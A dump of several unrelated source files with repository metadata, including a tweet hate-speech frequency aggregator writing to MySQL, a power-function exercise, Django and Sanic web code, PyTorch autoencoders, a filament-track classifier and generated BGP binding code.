" `administrative_division_0`, `administrative_division_1`,"
" `administrative_division_2` "
" from tweet_to_daily_token_frequency where `hs` is not NULL "
" order by year desc, month desc, day desc"
" limit 0,1000000 ")# AND `aggressiveness`is not NULL AND `offensiveness` is not NULL AND `stereotype` is not NULL AND `irony`is not NULL AND `intensity`is not NULL")
tweets=cur.fetchall()
stop_words = list(stopwords.words('italian'))+['https','http',"solo","senza","essere"]
for tweet in tweets:
#print(tweet[2].lower())
try:
id=tweet[0]
topic=tweet[1]
text=tweet[2].lower()
year=tweet[3]
month=tweet[4]
day=tweet[5]
"""
Un ciclo per ogni attributo: hs, aggressiveness etc..
"""
for attribute in cfg.attribute:
cur.execute(" SELECT "+attribute+" "
" from tweet_to_daily_token_frequency "
" where id=%s and topic=%s",(id,topic))
result=cur.fetchone()
label=result[-1]
#print(attribute,label,topic,text)
for h in extract_hashtags(text):
cur.execute("INSERT INTO "
"`daily_hashtag_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_"+attribute+"_"+label+"`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_"+attribute+"_"+label+"`=`count_"+attribute+"_"+label+"`+1",
(h,topic,year,month,day,1))
db.commit()
for m in extract_mentions(text):
cur.execute("INSERT INTO "
"`daily_mention_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(m,topic,year,month,day,1))
db.commit()
for w in extract_words(text,stop_words,cfg.topic[topic]):
if w not in extract_hashtags(text) and w not in extract_mentions(text):
cur.execute("INSERT INTO "
"`daily_word_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(w,topic,year,month,day,1))
db.commit()
words = extract_words(text, stop_words, cfg.topic[topic])
for i in range(0,len(words)):
for j in range(i,len(words)):
if i != j:
first = words[j] if words[j] < words[i] else words[i]
second = words[j] if words[i] < words[j] else words[i]
cur.execute(" INSERT INTO "
" `daily_co_occurrence_word_frequency` "
" (`token_1`,`token_2`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
" VALUES (%s,%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 ,"
" `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(first, second, topic, year, month, day, 1))
db.commit()
except Exception:
print(id,topic,attribute)
print(traceback.format_exc())
continue
"""
Quando le invormazioni del tweet vengono aggregate al conteggio giornaliero, il tweet viene 'backuppato'
"""
cur.execute(" INSERT INTO `tweet_backup`"
" select * "
" from tweet_to_daily_token_frequency where id=%s and topic=%s"
" on duplicate key update tweet_backup.id=tweet_backup.id",(id,topic))
db.commit()
cur.execute("delete from tweet_to_daily_token_frequency where id=%s and topic=%s",(id,topic))
db.commit()
# delete tokens that are not significant enough in the historical counts
cur.execute(" DELETE FROM daily_word_frequency "
" WHERE `count` <= 10")
db.commit()
# delete tokens that are not significant enough in the historical counts
cur.execute(" DELETE FROM daily_co_occurrence_word_frequency "
" WHERE `count` <= 10")
db.commit()
|
[
"mirko.lai.1987@gmail.com"
] |
mirko.lai.1987@gmail.com
|
dd18cdfbe69501f2406c26d36533b743dac44f83
|
b7eed26cf8a0042a61f555eed1e9bf0a3227d490
|
/students/semko_krzysztof/lesson_03_functions/negative_exponent.py
|
b4640e7d2c59c35ccf9a141a0a0f8dab95daf156
|
[] |
no_license
|
jedzej/tietopythontraining-basic
|
e8f1ac5bee5094c608a2584ab19ba14060c36dbe
|
a68fa29ce11942cd7de9c6bbea08fef5541afa0f
|
refs/heads/master
| 2021-05-11T11:10:05.110242
| 2018-08-20T12:34:55
| 2018-08-20T12:34:55
| 118,122,178
| 14
| 84
| null | 2018-08-24T15:53:04
| 2018-01-19T12:23:02
|
Python
|
UTF-8
|
Python
| false
| false
| 506
|
py
|
"""
Given a positive real number a and integer n.
Compute a^n. Write a function power(a, n) to calculate
the results using the function and print the result of the expression
Don't use the same function from the standard library.
"""
print("Operation a ^ n :")
print("Please input the 'a' value:")
a = float(input())
print("Please input the 'n' value:")
n = int(input())
result = 1  # start the running product at 1 so that n == 0 correctly gives a^0 = 1
for i in range(abs(n)):
    result *= a
if n < 0:
result = 1 / result
print("Result of a ^ n = " + str(result))
|
[
"krzysztof.semko@tieto.com"
] |
krzysztof.semko@tieto.com
|
e0196b9f2b975623a626b2f8e5e6443c6e5b41ef
|
95ac17da0188566c94c4c77fc416c5c1248d01ea
|
/leadmanager/leads/migrations/0001_initial.py
|
9d93db98d1177a4ff4af7e16bf19e38cb1ed13e7
|
[] |
no_license
|
andrew-cmdltt/react-django-app
|
a92ae6ab7451daccade2f498260182d90cef4259
|
83618b6aef353587932705f821aac3c8981a706a
|
refs/heads/master
| 2022-10-24T09:30:01.222069
| 2020-06-17T13:14:35
| 2020-06-17T13:14:35
| 272,444,949
| 0
| 0
| null | 2020-06-17T13:16:05
| 2020-06-15T13:22:09
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
# Generated by Django 3.0.7 on 2020-06-14 21:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Lead',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('email', models.EmailField(max_length=100, unique=True)),
('message', models.CharField(blank=True, max_length=500)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"menwhohas2279@gmail.com"
] |
menwhohas2279@gmail.com
|
918abb74e5bf9d3abb3964645d084e60ae5f9159
|
fa7a704b564c445cfd9178ca5c6a789854c84e77
|
/Article/forms.py
|
21d8b51ee19a98a8f04132e0fa4527f8d166cd1a
|
[
"MIT"
] |
permissive
|
surenjanath/Django-Medium-Article
|
17891dce096fb14e9a4de70a0bdf8d701ccd7361
|
b9a4e4aa29edfeb4c0260a4a365c24fdb9f4b0b8
|
refs/heads/master
| 2023-08-06T18:47:25.876461
| 2021-10-01T14:05:24
| 2021-10-01T14:05:24
| 411,857,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
from django import forms
class FeedbackForm(forms.Form):
Name = forms.CharField(
max_length = 30,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'type' : 'text',
'id' : 'name',
'placeholder' : 'Enter Your Name',
'name' : 'name',
}
)
)
Email = forms.CharField(
max_length = 50,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'type' : 'text',
'id' : 'email',
'placeholder' : 'Enter Your Email',
'name' : 'email',
}
)
)
Feedback = forms.CharField(
max_length = 1000,
widget = forms.TextInput(
attrs={'class' : 'form-control',
'id' : 'message',
'placeholder' : 'Enter Your Feedback',
'name' : 'message',
'rows' : '3',
}
)
)
|
[
"surenjanath.singh@gmail.com"
] |
surenjanath.singh@gmail.com
|
4b6c958cfa881db8ce637ba6a474e9f1ad8d79cc
|
2df5d06ec25dd449d5905bc5e2fd8acf8b8f5d50
|
/trichotracking/trackkeeper/_classifier.py
|
b9a49a2f6473cb3e6039deff8f44be4d6be93eda
|
[] |
no_license
|
giuliaschneider/Trichotracking
|
d702599676484577db41c5adebb4a85280faf45d
|
deb1be2626ac662a2b9c26de90bb323c8e10eafd
|
refs/heads/master
| 2020-06-19T15:13:31.816888
| 2019-09-05T13:52:12
| 2019-09-05T13:52:12
| 196,754,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,707
|
py
|
import numpy as np
import pandas as pd
from trichotracking.dfmanip import combineNanCols, groupdf, listToColumns
def getSingleFilamentTracks(df, dfg, aggTracks):
""" Returns trackNrs of for sure single filaments. """
# Calculate length variation dependent on length
dfg.loc[:, 'length_std_n'] = dfg.loc[:, 'length_std'] \
/ dfg.loc[:, 'length_mean']
dfg.loc[:, 'area_std_n'] = dfg.loc[:, 'area_std'] / dfg.loc[:, 'area_mean']
fsingleTracks1 = dfg[((~dfg['trackNr'].isin(aggTracks))
& (dfg['eccentricity_mean'] > 0.98)
& (dfg['length_std_n'] < 0.04)
& (dfg['nFrames'] > 4))].trackNr.values
fsingleTracks2 = dfg[((~dfg['trackNr'].isin(aggTracks))
& (dfg['eccentricity_mean'] > 0.93)
& (dfg['length_std_n'] < 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
fsingleTracks = np.append(fsingleTracks1, fsingleTracks2)
fsingleTracks = np.unique(fsingleTracks)
return fsingleTracks
def get2FilamentTracks(df, dfg, dfagg, fsingleTracks=[]):
""" Returns trackNrs of for aligned 2 filament particles. """
ffilTracks = dfagg[dfagg.n == 2].trackNr.values
filAlignedTracks = dfg[((dfg['trackNr'].isin(ffilTracks))
& (dfg['ews_mean'] < 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
filCrossTracks = dfg[((dfg['trackNr'].isin(ffilTracks))
& (dfg['ews_mean'] >= 0.02)
& (dfg['nFrames'] > 4))].trackNr.values
if len(fsingleTracks) > 0:
ffilTracks2 = dfagg[((dfagg.trackNr.isin(ffilTracks))
& ((dfagg.tracks00.isin(fsingleTracks)) | (dfagg.tracks00.isnull()))
& ((dfagg.tracks01.isin(fsingleTracks)) | (dfagg.tracks01.isnull()))
& ((dfagg.tracks10.isin(fsingleTracks)) | (dfagg.tracks10.isnull()))
& ((dfagg.tracks11.isin(fsingleTracks)) | (dfagg.tracks11.isnull())))].trackNr.values
filAlignedTracks = np.intersect1d(filAlignedTracks, ffilTracks2)
filCrossTracks = np.intersect1d(filCrossTracks, ffilTracks2)
dfagg = dfagg.join(dfg[['trackNr', 'length_mean']].set_index('trackNr'), on='deftrack1', rsuffix='1')
dfagg = dfagg.join(dfg[['trackNr', 'length_mean']].set_index('trackNr'), on='deftrack2', rsuffix='2')
dfagg['length_fraction'] = pd.DataFrame(
{'1': dfagg['length_mean'] / dfagg['length_mean2'], '2': dfagg['length_mean2'] / dfagg['length_mean']}).min(
axis=1)
dfagg = dfagg.join(dfg[['trackNr', 'ews_mean']].set_index('trackNr'), on='trackNr')
dfagg = dfagg.join(dfg[['trackNr', 'min_box_w_mean']].set_index('trackNr'), on='trackNr')
dfagg = dfagg.join(dfg[['trackNr', 'min_box_h_mean']].set_index('trackNr'), on='trackNr')
dfagg['min_box_fraction'] = pd.DataFrame({'1': dfagg['min_box_w_mean'] / dfagg['min_box_h_mean'],
'2': dfagg['min_box_h_mean'] / dfagg['min_box_w_mean']}).min(axis=1)
trueAlignedTracks = dfagg[dfagg.length_fraction / 2 > dfagg.min_box_fraction].trackNr.values
filAlignedTracks = np.intersect1d(filAlignedTracks, trueAlignedTracks)
return filAlignedTracks, filCrossTracks
def segment_filaments(df, dfagg):
""" Segments particle tracks into single and fil-fil tracks.
Postional arguments:
--------------------
dfaggFile : path to dfagg-textfile
dflinkedFile : path to dflinked - textfile
Returns:
--------
singleTracks : trackNrs of certain single tracks
ffilTracks : trackNrs of aligned filament-filaments iteractions
dfagg : dataframe of aggegrates
df : dataframe of all tracks
dfg : grouped dataframe
"""
# Split list into single columns
dfagg = dfagg.copy()
dfagg = listToColumns(dfagg, 'tracks0', ['tracks00', 'tracks01'])
dfagg = listToColumns(dfagg, 'tracks1', ['tracks10', 'tracks11'])
# Create column which has either trackNr before merge or after split
dfagg = combineNanCols(dfagg, 'deftracks', 'tracks0', 'tracks1')
# Split column
dfagg = listToColumns(dfagg, 'deftracks', ['deftrack1', 'deftrack2'])
aggTracks = dfagg.trackNr.values
# Import dflinked
if not 'ews' in df.keys():
df['ews'] = df.ew2 / df.ew1
# Group
dfg = groupdf(df)
fsingleTracks = getSingleFilamentTracks(df, dfg, aggTracks)
filAlignedTracks, filCrossTracks = get2FilamentTracks(df, dfg, dfagg, fsingleTracks)
return fsingleTracks, filAlignedTracks, filCrossTracks
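# Assumed usage sketch (illustrative only; the dataframes themselves come from the caller):
#   df    - per-track, per-frame dataframe (must provide ew1/ew2 or ews, length, etc.)
#   dfagg - aggregate dataframe describing merge/split events between tracks
#   fsingleTracks, filAlignedTracks, filCrossTracks = segment_filaments(df, dfagg)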
|
[
"giuliasc@student.ethz.ch"
] |
giuliasc@student.ethz.ch
|
9e83adce421bf9c78cabb3b50571669ffbedde74
|
b231e8be9f921a927779cb87debba9db268f4166
|
/models/representation_learning/autoencoder.py
|
b79489e6515f88182d167ffd02d7a0b91a74b161
|
[
"MIT"
] |
permissive
|
clairebub/interpretability
|
f98d42f52bf4c257e7b173deaf8abf0ef07c5111
|
8c71bbc976ce9382705a2395ad651da009ab4785
|
refs/heads/master
| 2022-07-22T05:15:26.728673
| 2020-03-12T06:43:02
| 2020-03-12T06:43:02
| 246,754,616
| 0
| 0
|
MIT
| 2022-06-22T01:22:08
| 2020-03-12T05:52:11
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,366
|
py
|
import torch
import torchvision
import torch.nn.functional as F
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torchvision.datasets import MNIST
import os
class SimpleAutoEncoder(nn.Module):
def __init__(self):
super(SimpleAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Linear(28 * 28, 128),
nn.ReLU(True),
nn.Linear(128, 64),
nn.ReLU(True), nn.Linear(64, 12), nn.ReLU(True), nn.Linear(12, 3))
self.decoder = nn.Sequential(
nn.Linear(3, 12),
nn.ReLU(True),
nn.Linear(12, 64),
nn.ReLU(True),
nn.Linear(64, 128),
nn.ReLU(True), nn.Linear(128, 28 * 28), nn.Tanh())
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class ConvAutoEncoder(nn.Module):
def __init__(self):
super(ConvAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 3, stride=3, padding=1), # b, 16, 10, 10
nn.ReLU(True),
nn.MaxPool2d(2, stride=2), # b, 16, 5, 5
nn.Conv2d(16, 8, 3, stride=2, padding=1), # b, 8, 3, 3
nn.ReLU(True),
nn.MaxPool2d(2, stride=1) # b, 8, 2, 2
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 16, 3, stride=2), # b, 16, 5, 5
nn.ReLU(True),
nn.ConvTranspose2d(16, 8, 5, stride=3, padding=1), # b, 8, 15, 15
nn.ReLU(True),
nn.ConvTranspose2d(8, 1, 2, stride=2, padding=1), # b, 1, 28, 28
nn.Tanh()
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class VAE(nn.Module):
def __init__(self):
super(VAE, self).__init__()
self.fc1 = nn.Linear(784, 400)
self.fc21 = nn.Linear(400, 20)
self.fc22 = nn.Linear(400, 20)
self.fc3 = nn.Linear(20, 400)
self.fc4 = nn.Linear(400, 784)
def encode(self, x):
h1 = F.relu(self.fc1(x))
return self.fc21(h1), self.fc22(h1)
def reparametrize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
if torch.cuda.is_available():
eps = torch.cuda.FloatTensor(std.size()).normal_()
else:
eps = torch.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu)
def decode(self, z):
h3 = F.relu(self.fc3(z))
return F.sigmoid(self.fc4(h3))
def loss_function(recon_x, x, mu, logvar):
"""
        recon_x: reconstructed (generated) images
x: origin images
mu: latent mean
logvar: latent log variance
"""
reconstruction_function = nn.MSELoss(size_average=False)
BCE = reconstruction_function(recon_x, x) # mse loss
# loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
KLD = torch.sum(KLD_element).mul_(-0.5)
# KL divergence
return BCE + KLD
def forward(self, x):
mu, logvar = self.encode(x)
z = self.reparametrize(mu, logvar)
return self.decode(z), mu, logvar
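if __name__ == '__main__':
    # Minimal smoke-test sketch (assumed example, not part of the original module):
    # one forward/backward pass of the VAE on random data shaped like flattened MNIST,
    # with the reconstruction + KL loss written out inline to mirror loss_function above.
    model = VAE()
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    batch = torch.rand(8, 784)
    recon, mu, logvar = model(batch)
    recon_loss = F.mse_loss(recon, batch, reduction='sum')
    kld = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
    loss = recon_loss + kld
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()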
|
[
"claire.smurfs@gmail.com"
] |
claire.smurfs@gmail.com
|
fb2073058ec3e55b7eb981a04172b31ef58a3181
|
cdd462f8d349c8de5cb5997dac8a952cc52f8f87
|
/quadratic.py
|
09cbaa61626b20bd03d054eed42246202497a58f
|
[] |
no_license
|
CynthiaW19/python
|
59bec0f47128ffb611b4ac294ea75080f616ecfc
|
04f574d29c81282cbdf8799d14e93c5a14338491
|
refs/heads/master
| 2021-01-21T22:19:10.224055
| 2017-11-27T20:44:05
| 2017-11-27T20:44:05
| 102,148,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
def roots(a, b, c):
    """Print the two roots of a*x^2 + b*x + c = 0 (roots are complex when the discriminant is negative)."""
D = (b*b - 4*a*c)**0.5
x_1 = (-b + D)/(2*a)
x_2 = (-b - D)/(2*a)
print('x1: {0}'.format(x_1))
print('x2: {0}'.format(x_2))
if __name__ == '__main__':
a = input('Enter a: ')
b = input('Enter b: ')
c = input('Enter c: ')
roots(float(a), float(b), float(c))
|
[
"noreply@github.com"
] |
CynthiaW19.noreply@github.com
|
cc894ecbfbe9fb9fd95391f173bc4b2009ea4b09
|
3d9315da397393cfe2548975340a461676e09f43
|
/blog/admin/fields.py
|
3bfe2b014ee0f08df16b5f510f4a91b48d34b466
|
[] |
no_license
|
flylixiaolong/zblog
|
d5c6c67ee88878d7d69a02d9fc6aac2b0e847a07
|
27ad03d4406487e82e00764d6b2f21ead49fd882
|
refs/heads/master
| 2020-03-22T14:22:02.947041
| 2018-07-30T14:08:59
| 2018-07-30T14:08:59
| 140,173,924
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 859
|
py
|
from flask_restful import fields
catalog_fields = {
'id': fields.Integer,
'catalog': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
catalogs_fields = {
'data': fields.List(fields.Nested(catalog_fields))
}
tag_fields = {
'id': fields.Integer,
'tag': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
post_fields = {
'id': fields.Integer,
'title': fields.String,
'summary': fields.String,
'content': fields.String,
'created_at': fields.DateTime(dt_format='iso8601'),
'updated_at': fields.DateTime(dt_format='iso8601')
}
comment_fields = {
'id': fields.Integer,
'name': fields.String,
'email': fields.String,
'content': fields.String
}
|
[
"fly_lxl@foxmail.com"
] |
fly_lxl@foxmail.com
|
8a00aabd8f7d244451bb48f691205665c5b2795d
|
6c98c0aff2adf038869552eed51b81553335122e
|
/zufang_spider/zufang_spider/middlewares.py
|
85586e714d3f22fd4d7ac1fc8da56422a42f31f5
|
[] |
no_license
|
junhao99/zufang_info
|
cbcc987cf2b4d912134f557ce5328ddf5e4a8dc5
|
25dd5bf9f78dd767bb05d571ac73d601c0aca0cc
|
refs/heads/master
| 2020-03-23T15:50:42.692226
| 2018-08-15T12:33:26
| 2018-08-15T12:33:26
| 141,778,223
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,609
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class ZufangSpiderSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class ZufangSpiderDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
        # Must either:
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
|
[
"1258884157@qq.com"
] |
1258884157@qq.com
|
20cbbb48dbd67f8e60c7a07a9a3a16018b2bb8d4
|
c57821d96fff756251fe646eab15ebada3037f65
|
/transport/sanic/endpoints/users/user_login.py
|
0b5456473e8e719bde88a69ddbf918bab649e17e
|
[] |
no_license
|
hyperman98/NapoleonITPython
|
cf258e510edc8215056e06a8382dd365929a3a00
|
4d871d63206b546bd6b52670af0ddd9c9dbd6e6e
|
refs/heads/master
| 2023-02-26T18:27:56.291674
| 2021-02-04T11:24:36
| 2021-02-04T11:24:36
| 335,350,054
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
from sanic.request import Request
from sanic.response import BaseHTTPResponse
from api.request import RequestPatchUserLoginDto
from db.database import DBSession
from db.exceptions import DBIntegrityException, DBDataException, DBUserDeletedException, DBUserAlreadyExistsException
from db.queries import user as user_queries
from transport.sanic.endpoints import BaseEndpoint
from transport.sanic.exceptions import SanicDBException, SanicUserDeletedException
class ChangeLoginEndpoint(BaseEndpoint):
async def method_patch(
self, request: Request, body: dict, session: DBSession, user_id: int, token: dict, *args, **kwargs
) -> BaseHTTPResponse:
        # check that the user is sending the request on their own behalf
if token.get('id') != user_id:
return await self.make_response_json(status=403)
request_model = RequestPatchUserLoginDto(body)
try:
user_queries.change_login(session, request_model.login, user_id)
except DBUserAlreadyExistsException:
return await self.make_response_json(status=409, message='User already exists')
except DBUserDeletedException:
raise SanicUserDeletedException('User deleted')
try:
session.commit_session()
except (DBIntegrityException, DBDataException) as error:
raise SanicDBException(str(error))
return await self.make_response_json(status=200)
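# Assumed behaviour sketch (illustrative only; route and payload key are hypothetical):
# a PATCH request whose JSON body carries the new login, e.g. {"login": "new_name"},
# returns 200 on success, 403 when user_id does not match the token,
# 409 when the login is already taken, and an error response when the user is deleted.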
|
[
"xhuman80@gmail.com"
] |
xhuman80@gmail.com
|
41aa8448f402077b23d848d005c647dc4a948aed
|
be0120c72c636afadca117518b3ca3c69412dd64
|
/ifElseAss.py
|
c167730e56850115ee4ff41ff4e989f907a6e1ce
|
[] |
no_license
|
adhiambokonyango/Python
|
b2a6c91d85c8949ec3b55e6ec591a452d075b504
|
91865b44c8c544ed3c4935979bfa7d9be3f5dc52
|
refs/heads/master
| 2021-01-06T09:49:54.492587
| 2020-02-18T06:15:27
| 2020-02-18T06:15:27
| 241,286,388
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
py
|
age = int(input('enter age:'))
price = 30
if age >= 65:
print('price is', price*0.5)
elif age < 6:
print('price is null')
else:
print('price is ', price)
|
[
"noreply@github.com"
] |
adhiambokonyango.noreply@github.com
|
c63c8f4e49da3cd7207c53bc9e50125f115cc895
|
de4b601e50cc73f63c3cb812c347e8fd4b50e269
|
/Python/124BinaryTreeMaximumPathSum/dfs.py
|
a2bf52f4140c00072366122cc248e67f93574492
|
[] |
no_license
|
siddharthkale97/Leetcode-Problems-Tracker
|
f8867eada62d6261a62cfc2f79d021b0dce7e9e7
|
1df6fc3baa4b9d716cabfd791911e2fdc9db08ba
|
refs/heads/main
| 2023-08-02T04:20:32.695643
| 2021-10-08T05:44:03
| 2021-10-08T05:44:03
| 396,057,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
from typing import Optional

# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def maxPathSum(self, root: Optional[TreeNode]) -> int:
res = [root.val]
def dfs(root):
if not root:
return 0
leftMax = dfs(root.left)
rightMax = dfs(root.right)
leftMax = max(leftMax,0)
rightMax = max(rightMax,0)
res[0] = max(res[0], root.val + leftMax + rightMax)
return root.val + max(leftMax, rightMax)
dfs(root)
return res[0]
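if __name__ == '__main__':
    # Minimal usage sketch (assumed example, not part of the original submission):
    # the tree [1, 2, 3] has maximum path sum 2 + 1 + 3 = 6.
    tree = TreeNode(1, TreeNode(2), TreeNode(3))
    print(Solution().maxPathSum(tree))  # expected: 6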
|
[
"siddharthkale97@gmail.com"
] |
siddharthkale97@gmail.com
|
7ac005eb42f091c51ab83c544466c0b346ebb421
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/slxos/v17r_1_01a/routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/__init__.py
|
04c42af43f0958e01b8c6d558ea778ef0e670444
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124,806
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import shutdown
import af_vrf_neighbor_capability
import filter_list
import maximum_prefix
import default_originate
import prefix_list
import neighbor_route_map
import unsuppress_map
import additional_paths
import local_as
import next_hop_self
import advertisement_interval
import ebgp_multihop
import enforce_first_as
import timers
import soft_reconfiguration
import bfd
import maxas_limit
import update_source
import send_community
class af_ipv4_neighbor_addr(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/router/router-bgp/address-family/ipv4/ipv4-unicast/af-vrf/neighbor/af-ipv4-vrf-neighbor-address-holder/af-ipv4-neighbor-addr. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__af_ipv4_neighbor_address','__remote_as','__shutdown','__af_vrf_neighbor_capability','__allowas_in','__filter_list','__maximum_prefix','__default_originate','__prefix_list','__neighbor_route_map','__route_reflector_client','__unsuppress_map','__af_nei_weight','__enable_peer_as_check','__additional_paths','__associate_peer_group','__description','__local_as','__next_hop_self','__advertisement_interval','__ebgp_btsh','__ebgp_multihop','__password','__enforce_first_as','__timers','__remove_private_as','__as_override','__soft_reconfiguration','__static_network_edge','__bfd','__maxas_limit','__update_source','__send_community','__activate',)
_yang_name = 'af-ipv4-neighbor-addr'
_rest_name = 'af-ipv4-neighbor-addr'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__default_originate = YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
